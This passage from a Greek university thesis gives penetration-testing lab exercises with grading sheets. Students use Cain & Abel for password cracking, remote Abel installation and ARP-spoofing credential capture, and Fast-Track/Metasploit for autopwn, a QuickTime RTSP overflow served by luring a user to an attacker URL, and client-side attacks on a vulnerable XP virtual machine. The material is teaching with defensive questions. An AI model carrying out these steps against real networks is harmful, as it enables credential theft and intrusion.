είναι ο εκτιμώμενος χρόνος που απαιτείται για να το επιτύχει αυτό η εφαρμογή (πεδίο “Time Left”);

Page 219: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

219 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Επίθεση Κρυπτανάλυσης με Rainbow Tables

7. Για το λογαριασμό που διαθέτει αδύναμο συνθηματικό καταφέρατε με τη μέθοδο της κρυπτανάλυσης

να το ανακτήσετε; Αν ναι, πόσο χρονικό διάστημα χρειάστηκε περίπου;

8. Για το λογαριασμό που διαθέτει ισχυρό συνθηματικό καταφέρατε με τη μέθοδο της κρυπτανάλυσης

να το ανακτήσετε; Τι παρατηρείτε; Τι θα κάνατε εναλλακτικά για ανακτήσετε το συνθηματικό με την

ίδια μέθοδο;

Συνολική Θεώρηση

9. Από τις μεθόδους ανάκτησης συνθηματικών που εξετάσατε υπάρχει κάποια που κατά τι δική σας

εκτίμηση είναι καλύτερη έναντι των άλλων και γιατί;

10. Ποια συμπεράσματα εξάγονται για τα συνθηματικά;

11. Πώς θα πρέπει να διαμορφωθεί η πολιτική ασφάλειας ενός οργανισμού σε σχέση με τα συνθηματικά

για να προστατέψει τα πληροφοριακά του συστήματα από επιθέσεις όπως αυτές που εξετάσατε;

Καταγράψτε τις προτάσεις σας.

Page 220: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

220 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.3.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

CAIN & ABEL

Εργαλείο CAIN & ABEL

Γνωστικό Πεδίο Ανάκτηση συνθηματικών (Password Cracking)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η διερεύνηση των πληροφοριών που μπορεί να συλλέξει

ένας επιτιθέμενος για τους υπολογιστές του δικτύου, τους χρήστες και τα συνθηματικά τους

χρησιμοποιώντας το Abel. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να

κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• την συλλογή πληροφοριών για λογαριασμούς χρηστών και των συνθηματικών τους σε

ένα δίκτυο

• τα συνθηματικά και την πολιτική συνθηματικών

• τη συλλογή πληροφοριών για τα μηχανήματα του δικτύου

Περιγραφή

Οι φοιτητές θα πρέπει να εντοπίσουν ένα μηχάνημα στόχο στο δίκτυο τους, να

εγκαταστήσουν σε αυτό το Abel και να διερευνήσουν τις δυνατότητες για συλλογή

πληροφοριών που παρέχει το Abel στο απομακρυσμένο μηχάνημα. Τέλος θα πρέπει να

δημιουργήσουν ένα λογαριασμό χρήστη στο απομακρυσμένο μηχάνημα και να

προσπαθήσουν να ανακτήσουν τα συνθηματικά των υπαρχόντων λογαριασμών χρηστών. Τα

βήματα που πρέπει να ακολουθήσουν για να το επιτύχουν αυτό είναι τα εξής:

1. Εκκινούν την εφαρμογή Cain στον υπολογιστή τους

2. Επιλέγουν το tab “Network” και κάνοντας διπλό κλικ στο “Microsoft Windows Network”

εμφανίζεται το όνομα του δικτύου. Με κλικ στο + εμφανίζονται σε δενδροειδή μορφή οι

διαθέσιμες επιλογές. Κάνοντας διπλό κλικ στο “All Computers” εμφανίζονται όλοι οι

υπολογιστές που είναι συνδεδεμένοι στο δίκτυο.

Page 221: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

221 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

3. Αφού εντοπιστεί ο υπολογιστής στόχος θα πρέπει να συνδεθούν σε αυτόν με κάποιον

λογαριασμό, του οποίου τα στοιχεία έχουν εντοπιστεί προηγουμένως με sniffing,

κάνοντας δεξί κλικ και “Connect As”. Στο παράθυρο που εμφανίζεται πληκτρολογείται

το username και το Password.

4. Με δεξί κλικ στο “Services->Install Abel” γίνεται η εγκατάσταση στο απομακρυσμένο

μηχάνημα.

Στη συνέχεια θα πρέπει να διερευνηθούν οι δυνατότητες που παρέχει το Abel στο

απομακρυσμένο μηχάνημα και να προστεθούν νέοι χρήστες σε αυτό. Η εντολή που

χρησιμοποιείται για την προσθήκη νέων χρηστών είναι “net user username password /add”.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 222: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

222 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Cain & Abel

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποιοι είναι οι υπολογιστές του δικτύου σας; Τι πληροφορίες σας παρέχονται για το λειτουργικό

σύστημα που χρησιμοποιούν;

2. Τι δυνατότητες σας παρέχει η εγκατάσταση του Abel στον απομακρυσμένο υπολογιστή; Σε ποια

επίπεδα πληροφορίας έχετε πρόσβαση;

3. Δοκιμάστε να ανακτήσετε τα συνθηματικά των χρηστών από τον απομακρυσμένο υπολογιστή.

Καταγράψτε τα ευρήματά σας και αναφέρατε τη μέθοδο που χρησιμοποιήσατε.

4. Δημιουργήστε ένα λογαριασμό χρήστη στο απομακρυσμένο μηχάνημα. Επιβεβαιώστε την εγγραφή.

Καταγράψτε τα στοιχεία του. (username, password)

5. Είναι δυνατόν να ανιχνευτεί η εγκατάσταση του Abel στο απομακρυσμένο μηχάνημα; Μπορεί να

αποτραπεί; Με ποιο τρόπο;

Page 223: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

223 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.3.3 Σύνθετη Άσκηση ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

CAIN & ABEL

Εργαλείο CAIN & ABEL

Γνωστικό Πεδίο Ανάκτηση συνθηματικών (Password Cracking)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τις επιθέσεις Man In The

Middle και του τρόπου με τον οποίο ένας επιτιθέμενος μπορεί να ανακτήσεις πληροφορίες

για το δίκτυο ενός οργανισμού παραποιώντας και υποκλέπτοντας την δικτυακή κίνηση μέσω

της εκμετάλλευσης των ευπαθειών του πρωτοκόλλου ARP. Αναμένεται μέσω αυτής της

άσκησης οι φοιτητές να κατανοήσουν καλύτερα τις έννοιες που σχετίζονται με:

• με τις επιθέσεις ενδιαμέσου (Man In The Middle attack)

• τις ευπάθειες του πρωτοκόλλου ARP

• την δυνατότητα αλλαγής MAC διευθύνσεων (spoofing)

• τις πληροφορίες που μπορούν να συλλεχθούν και πως μπορούν να αξιοποιηθούν από

έναν επιτιθέμενο

Περιγραφή

Οι φοιτητές θα πρέπει να πραγματοποιήσουν μια επίθεση ενδιαμέσου σε ένα μηχάνημα του

δικτύου κάνοντας spoofing τη MAC διεύθυνσή του και να ανακτήσουν όσες περισσότερες

πληροφορίες μπορούν. Τα βήματα που πρέπει να ακολουθήσουν για να το επιτύχουν αυτό

είναι τα εξής:

5. Εκκινούν την εφαρμογή Cain στον υπολογιστή τους

6. Επιλέγουν το tab “Sniffer” και επιβεβαιώνουν ότι βρίσκονται στο tab “Hosts”

7. Από τα εικονίδια του μενού επιλογών κάνουν κλικ στο εικονίδιο “Sniffer”

8. Κάνουν κλικ στο μπλε + για να αρχίσει η αναζήτηση των κόμβους. Μόλις ολοκληρωθεί η

διαδικασία επιλέγοντας κάθε έναν κόμβο και κάνοντας δεξί κλικ μπορεί να ανακτηθεί το

όνομά του στο δίκτυο μέσω της επιλογής “Resolve Host Name”

Page 224: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

224 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

9. Στη συνέχεια επιλέγεται το tab “ARP” και από εκεί γίνεται κλικ με το ποντίκι στο μπλε +.

10. Στο παράθυρο που εμφανίζεται επιλέγεται στο αριστερό μέρος ο δρομολογητής του

δικτύο υ και στο δεξιό το μηχάνημα του ο πο ίου την δικτυακή κίνηση θέλουμε να

συλλέξουμε και τέλος επιλέγεται ΟΚ.

11. Για να ξεκινήσει η επίθεση επιλέγεται το εικονίδιο “Start/Stop ARP”

12. Επιλέγεται το tab “Passwords” του “Sniffer” ό που γίνεται η καταγραφή ό λης της

δικτυακής κίνησης του μηχανήματος στο οποίο έχει πραγματοποιηθεί η επίθεση.

Στη συνέχεια στο μηχάνημα στο οποίο έχει πραγματοποιηθεί η επίθεση χρησιμοποιείται

ένας φυλλομετρητής ιστού για την περιήγηση σε διάφορες ιστοσελίδες. Η ενέργεια αυτή

μπορεί να πραγματοποιηθεί από τον εισηγητή. Μεταξύ άλλων προτείνονται οι εξής

ενέργειες:

• Προσπάθεια εισόδου σε ένα web mail server όπως π.χ. Yahoo, Hotmail

• Προσπάθεια εισόδου σε έναν web mail server όπως π.χ. www.freemail.gr

• Ανάκτηση ενός αρχείου από τη βιβλιοθήκη του www.cis.aueb.gr με χρήση συνθηματικών

Αφού πραγματοποιηθούν οι παραπάνω ενέργειες οι φοιτητές θα πρέπει να μεταβούν στο tab

“Passwords” του “Sniffer”, να επιλέξουν το “HTTP” και να μελετήσουν τα δεδομένα που

έχουν καταγραφεί.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 225: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

225 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Cain & Abel

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Τι είδους πληροφορία έχει καταγραφεί;

2. Η επίσκεψη σε web mail server όπως π.χ. www.freemail.gr επιτρέπει την ανάκτηση των

συνθηματικών που χρησιμοποιήθηκαν; Αν ναι, γιατί πιστεύεται ότι συνέβη αυτό;

3. Η επίσκεψη σε web mail server όπως π.χ. Yahoo, Hotmail επιτρέπει την ανάκτηση των

συνθηματικών που χρησιμοποιήθηκαν; Αν όχι, γιατί πιστεύεται ότι συνέβη αυτό;

4. Καταγράψτε από ποιες ιστοσελίδες κατάφερε το Cain να ανακτήσει συνθηματικά.

5. Με ποιους τρόπους μπορεί να εκμεταλλευτεί τις πληροφορίες που συλλέγονται με αυτό τον τρόπο

ένας επιτιθέμενος;

6. Προτείνετε τρόπους αντιμετώπισης τέτοιου είδους επιθέσεων.

Page 226: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

226 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.4 Fast-Track

6.4.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Fast-Track

Εργαλείο Fast-Track

Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με το εργαλείο και η ανάδειξή των δυνατοτήτων του. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με: • τον έλεγχο τρωτότητας ενός πληροφοριακού συστήματος • την εκμετάλλευση των ευπαθειών του • τις δυνατότητες μιας επιτυχημένης εκμετάλλευσης Περιγραφή Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη συνέχεια θα εκκινήσουν το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Penetration->All->Fast-Track

WebGui. Στη συνέχεια θα επιλέξουν το Autopwn Automation, θα προσδιορίσουν την ΙΡ διεύθυνση του μηχανήματος στόχου, θα επιλέξουν Reverce Payload και τέλος Metasploit Autopwn. Το εργαλείο θα χρησιμοποιήσει το Nmap για να ελέγξει ποιες θύρες είναι ανοιχτές στο μηχάνημα στόχο και ποιες υπηρεσίες εκτελούνται σε αυτές. Στη συνέχεια θα χρησιμοποιήσει τo Metasploit το οποίο θα δοκιμάσει όλα τα exploits για τις ενεργές υπηρεσίες που εντοπίστηκαν. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 227: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

227 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Fast-Track

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια η λειτουργία της επιλογής Autopwn Automation;

2. Ποια τα είναι τα αποτελέσματα από το τρέξιμο του εργαλείου με την επιλογή Autopwn

Automation;

3. Περιγράψτε μια κακόβουλη ενέργεια που μπορεί να πραγματοποιήσει ένας επιτιθέμενος στο

μηχάνημα στόχο μετά την επιτυχημένη εκμετάλλευση των ευπαθειών του με την επιλογή Autopwn

Automation του Fast-Track.

4. Πώς θα μπορούσαν να περιοριστούν οι πιθανότητες επιτυχημένης εκμετάλλευσης του μηχανήματος

στόχου;

Page 228: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

228 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.4.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Fast-Track

Εργαλείο Fast-Track

Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εκμετάλλευση μιας γνωστής ευπάθειας ενός μηχανήματος

στόχου με χρήση κοινωνικής μηχανικής. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές

να κατανοήσουν έννοιες σχετικά με:

• της μεθόδους που χρησιμοποιούν οι επιτιθέμενοι για να επιτύχουν το σκοπό τους

• τη χρήση της κοινωνικής μηχανικής για την εκμετάλλευση ενός μηχανήματος στόχου

• την εκμετάλλευση μιας γνωστής ευπάθειας μιας εφαρμογής

Περιγραφή

Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να

ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό

και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη

συνέχεια θα εκκινήσουν το εικονικό PC: Vulnerable XP Professional. Από το K Menu του

BackTrack 4 επιλέγουν BackTrack->Penetration->All->Fast-Track

WebGui. Στη συνέχεια θα επιλέξουν από τα Exploits το QuickTime 7.3 RTSP SHE

Overflow (Universal). Έπειτα θα προσπαθήσουν να πείσουν κάποιον χρήστη ενός

μηχανήματος του δικτύου να συνδεθεί στη διεύθυνση http://ip_attackHost:554 με κάποια

πρόφαση (π.χ. να δει ο χρήστης του μηχανήματος στόχου ένα πολύ ενδιαφέρον βίντεο που

βρίσκεται αποθηκευμένο στο μηχάνημα του επιτιθέμενου). Μόλις το θύμα συνδεθεί μέσω

του φυλλομετρητή ιστού στην παραπάνω διεύθυνση στο τερματικό του επιτιθέμενου θα

εμφανιστεί: [+] Done, connect to ΧΧΧ.ΧΧΧ.Χ.Χ on port 3333, το οποίο

σημαίνει ότι το μηχάνημα στόχος του δικτύου με ΙΡ διεύθυνση ΧΧΧ.ΧΧΧ.Χ.Χ έχει

Page 229: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

229 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

δημιουργήσει ένα κανάλι επικοινωνίας με το μηχάνημα του επιτιθέμενου το οποίο

ακροάζεται στη θύρα 3333. Μετά από 10 δευτερόλεπτα θα εμφανιστεί στο τερματικό του

επιτιθέμενου το C:\Program Files\QuickTime του θύματος.

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 230: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

230 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Fast-Track

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Περιγράψτε 3 μεθόδους κοινωνικής μηχανικής.

2. Τι λειτουργία επιτυγχάνει το συγκεκριμένο exploit;

3. Η επιτυχημένη χρήση του Exploit που χρησιμοποιήσατε στην άσκηση τη δυνατότητες εκμετάλλευσης

του μηχανήματος στόχου σας παρέχει;.

4. Προτείνετε τρόπους αντιμετώπισης της συγκεκριμένης ευπάθειας του μηχανήματος στόχου;

5. Τι προτείνατε για την αντιμετώπιση των επιθέσεων κοινωνικής μηχανικής;

Page 231: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

231 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.4.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Fast-Track

Εργαλείο Fast-Track Γνωστικό Πεδίο Εκμετάλλευση Ευπαθειών (Vulnerability Exploitation) Τύπος Άσκησης Τεχνική Βαθμός Δυσκολίας 3 Συμμετοχή Ομάδες 2 ατόμων Ώρες Διδασκαλίας 45 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τις μεθόδους κοινωνικής μηχανικής και την αναγκαιότητα εκπαίδευσης των χρηστών ενός πληροφοριακού συστήματος. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν έννοιες σχετικά με: • τις μεθόδους κοινωνικής μηχανικής που χρησιμοποιούν οι επιτιθέμενοι • την επικινδυνότητα της έλλειψης εκπαίδευσης των χρηστών • τις δυνατότητες για μια επιτυχημένη εκμετάλλευση που παρέχει το εργαλείο Περιγραφή Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη συνέχεια θα εκκινήσουν το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Penetration->All->Fast-Track

WebGui. Στη συνέχεια θα επιλέξουν Mass Client Side Attack, θα προσδιορίσουν μια ΙΡ διεύθυνση στο δίκτυο στην οποία το εργαλείο θα εκκινήσει τον ψευδή HTTP server, θα επιλέξουν το payload που θα χρησιμοποιηθεί και θα προσδιορίσουν την ΙΡ διεύθυνση του μηχανήματος στόχου. Τέλος θα πρέπει να πείσουν κάποιον χρήστη του δικτύου να συνδεθεί στην διεύθυνση που τρέχει ο ψευδής HTTP server και να διερευνήσουν τις δυνατότητες που τους παρέχει η επιτυχημένη εκμετάλλευση του μηχανήματος στόχου. Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 232: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

232 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Fast-Track

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια η λειτουργία της επιλογής Mass Client Side Attack;

2. Τη συμβαίνει όταν ο χρήστης του δικτύου επισκεφτεί την ψευδή σελίδα;

3. Τι δυνατότητες σας παρέχει η επιτυχημένη εκμετάλλευση του μηχανήματος;

4. Σε ένα πραγματικό δίκτυο, με ποιον τρόπο θα μπορούσε να αποφευχθεί η επίθεση κοινωνικής

μηχανικής;

5. Ποιος ο ρόλος της πολιτικής ασφάλειας στην αντιμετώπιση τέτοιου είδους επιθέσεων;

Page 233: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

233 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.5 Metasploit

6.5.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

